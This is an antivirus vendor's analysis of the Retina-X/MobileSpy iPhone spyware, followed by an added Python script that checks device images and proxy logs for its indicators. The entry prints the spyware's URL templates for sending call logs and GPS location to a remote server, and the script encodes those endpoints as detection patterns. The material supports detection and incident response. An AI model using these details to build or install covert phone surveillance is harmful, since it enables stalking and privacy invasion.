Spy/MobileSpy!iPhoneOS

Aliases: Spyware:WinCE/BopSmiley.A, SPR/MobileSpy, SPR/RetinaX.A
Release Date: Aug 28, 2009

Detection Availability   Active Database   Extended Database
FortiGate                low               high
FortiClient
FortiMail                N/A
Current Antivirus Definition Database Version: 12.196
Description

Visible Symptoms

  • in Cydia, an application named Retina-X is installed
  • presence of the following daemons:
    • /usr/libexec/msd
    • /usr/libexec/mslocd


Figure 1. Infected mobile phone, on which Retina-X is installed

Detailed Analysis

This is the iPhone version of Spy/MobileSpy!WinCE. It allows an attacker to eavesdrop on the activity of a remote iPhone: all incoming and outgoing calls, SMS messages and URLs are logged to a webserver the attacker has access to. The geographic location of the victim is logged too. The attacker has a personal account on the remote webserver (https://www.{REMOVED}spylogs.com).

As for Spy/MobileSpy!WinCE, it must be noted that proper installation of the spyware requires physical access to the victim's device.

Installation of this spyware requires a jailbroken iPhone. Applications for jailbroken iPhones are usually installed with an application named Cydia, which browses third-party application repositories. This spyware is found in such repositories under the name Retina-X.

Technical Details

The spyware installs or creates the following files on the iPhone:
  • System/Library/LaunchDaemons/com.ms.msd.plist: this launchd property list ensures the msd daemon is started after every reboot and kept running permanently.
  • System/Library/LaunchDaemons/com.ms.mslocd.plist: the same, for the mslocd daemon.
  • User/Library/SMS/sms.db: an SQLite 3 database that stores the victim's messages, the spyware's version and various internal counters.
  • User/Library/CallHistory/call_history.db: the same as sms.db, but for call logs.
  • usr/libexec/msd: the main spyware daemon
  • usr/libexec/mslocd: the location manager daemon
  • var/mobile/.ll.dat
The logs are sent to a remote website over HTTP:
  • call logs contain the time of the call and the originating and destination phone numbers. The spyware sends each log to the remote webserver using a URL such as:
    http://{REMOVED}/webapi/calllog.php?sID=THE-ID&date=CALL-DATE&time=CALL-TIME&from=SENDER-PHONE-NUMBER&to=RECIPIENT-PHONE-NUMBER&dir=DIRECTION&dur=DURATION
    
    The direction is either incoming (SMS received on the victim's phone) or outgoing (SMS sent by the victim).
  • SMS logs are sent using http://{REMOVED}/webapi/sms.php
  • geographic location logs are sent with this URL:
    http://{REMOVED}/webapi/gpslog.php?sID=LOG-ID&long=LONGITUDE&lat=LATITUDE&speed=SPEED
    
Logs are stored in an SQL database. There are at least 3 tables:
  • call_queue is the table for logged calls. It contains the phone number of the call, the date, the duration and flags.
  • msg_queue is the table for logged messages. It contains the phone number of the message, the date, the text and flags.
  • cfg is the table that stores the attacker's account. It has two fields: the user identifier (usr) and the password (passwd).
The spyware also features an automatic update process: it fetches an XML file from a fixed address that lists the download URLs of the various versions of the spyware.
The daemons rely on the curl, SQLite 3 and TinyXML libraries.
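The following Python script is an added example (it is not Fortinet's code and contains nothing taken from the spyware) that turns the indicators listed above into two checks a responder can run: a host-side scan of a device filesystem image for the installed files and for the call_queue, msg_queue and cfg tables in sms.db, and a network-side scan of proxy log lines for requests to the /webapi/calllog.php, /webapi/sms.php and /webapi/gpslog.php endpoints with the query parameters described above. The directory tree, database and log lines it scans are constructed inside the script; the hostname spylogs.invalid is a placeholder standing in for the removed server name, and the file contents and table columns are assumptions, since the page does not give them.

```python
"""Host and network indicator checks for the Retina-X / MobileSpy iPhone spyware.

Added example: the sample directory tree, database and proxy log lines are
constructed here for demonstration; nothing below is taken from a real device.
"""
import os
import re
import sqlite3
import tempfile
from urllib.parse import parse_qs, urlsplit

# File paths from the description, relative to the iPhone filesystem root.
HOST_INDICATORS = [
    "System/Library/LaunchDaemons/com.ms.msd.plist",
    "System/Library/LaunchDaemons/com.ms.mslocd.plist",
    "usr/libexec/msd",
    "usr/libexec/mslocd",
    "var/mobile/.ll.dat",
]
SMS_DB_REL = "User/Library/SMS/sms.db"
# Table names the spyware keeps in its SQLite database.
SPYWARE_TABLES = {"call_queue", "msg_queue", "cfg"}
# Exfiltration endpoints and the query parameters the description lists for each.
EXFIL_ENDPOINTS = {
    "/webapi/calllog.php": {"sID", "date", "time", "from", "to", "dir", "dur"},
    "/webapi/sms.php": set(),  # parameters not documented on the page
    "/webapi/gpslog.php": {"sID", "long", "lat", "speed"},
}

def scan_filesystem(root):
    """Return the indicator paths that exist under root, in list order."""
    return [p for p in HOST_INDICATORS if os.path.exists(os.path.join(root, p))]

def scan_sqlite(db_path):
    """Return the spyware table names present in an SQLite database, sorted."""
    con = sqlite3.connect(db_path)
    try:
        rows = con.execute("SELECT name FROM sqlite_master WHERE type='table'")
        return sorted(SPYWARE_TABLES & {r[0] for r in rows})
    finally:
        con.close()

def scan_device(root):
    """Combine the host checks into one report for a filesystem image at root."""
    db = os.path.join(root, SMS_DB_REL)
    return {
        "paths": scan_filesystem(root),
        "tables": scan_sqlite(db) if os.path.exists(db) else [],
    }

URL_RE = re.compile(r'\b(https?://[^\s"]+)')

def scan_proxy_log(lines):
    """Flag log lines whose URL path is one of the exfiltration endpoints.

    'complete' is True when every parameter documented for that endpoint is
    present, which separates a full log upload from a bare probe of the path.
    """
    hits = []
    for line in lines:
        for url in URL_RE.findall(line):
            parts = urlsplit(url)
            expected = EXFIL_ENDPOINTS.get(parts.path)
            if expected is None:
                continue
            params = parse_qs(parts.query)
            hits.append({
                "endpoint": parts.path,
                "sID": params.get("sID", [None])[0],
                "complete": expected <= set(params),
            })
    return hits

def build_sample_root():
    """Create a constructed tree that mimics an infected device (sample data only)."""
    root = tempfile.mkdtemp(prefix="retinax-sample-")
    for rel in HOST_INDICATORS[:4]:  # both plists and both daemons; .ll.dat omitted
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("sample placeholder content\n")  # assumed, not the real file
    db = os.path.join(root, SMS_DB_REL)
    os.makedirs(os.path.dirname(db), exist_ok=True)
    con = sqlite3.connect(db)
    con.executescript(  # column names assumed from the page's field descriptions
        "CREATE TABLE call_queue(number TEXT, date TEXT, duration INTEGER, flags INTEGER);"
        "CREATE TABLE msg_queue(number TEXT, date TEXT, text TEXT, flags INTEGER);"
        "CREATE TABLE cfg(usr TEXT, passwd TEXT);"
        "CREATE TABLE message(ROWID INTEGER PRIMARY KEY, text TEXT);"  # ordinary iOS table
    )
    con.commit()
    con.close()
    return root

# Constructed proxy log lines; spylogs.invalid is a placeholder for the removed host.
SAMPLE_PROXY_LOG = [
    '10.0.0.12 - - [28/Aug/2009:10:02:11 +0000] "GET http://spylogs.invalid/webapi/calllog.php'
    '?sID=1234&date=2009-08-28&time=10:01:55&from=5550100&to=5550199&dir=out&dur=42 HTTP/1.1" 200 17',
    '10.0.0.12 - - [28/Aug/2009:10:05:40 +0000] "GET http://spylogs.invalid/webapi/gpslog.php'
    '?sID=1234&long=2.3522&lat=48.8566&speed=0 HTTP/1.1" 200 17',
    '10.0.0.12 - - [28/Aug/2009:10:06:02 +0000] "GET http://example.invalid/index.php?id=5 HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    print(scan_device(build_sample_root()))
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(hit)
```

Matching on the URL path rather than the hostname is deliberate: the server name was removed from the description and can change between versions, while the endpoint paths and parameter names are what the daemons actually emit. On a real image, point scan_device at the mount point of the device filesystem and feed scan_proxy_log the web proxy or egress logs for the period of interest.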
Description Last Updated Date: Sep 01, 2009
Reference: ID - 1012173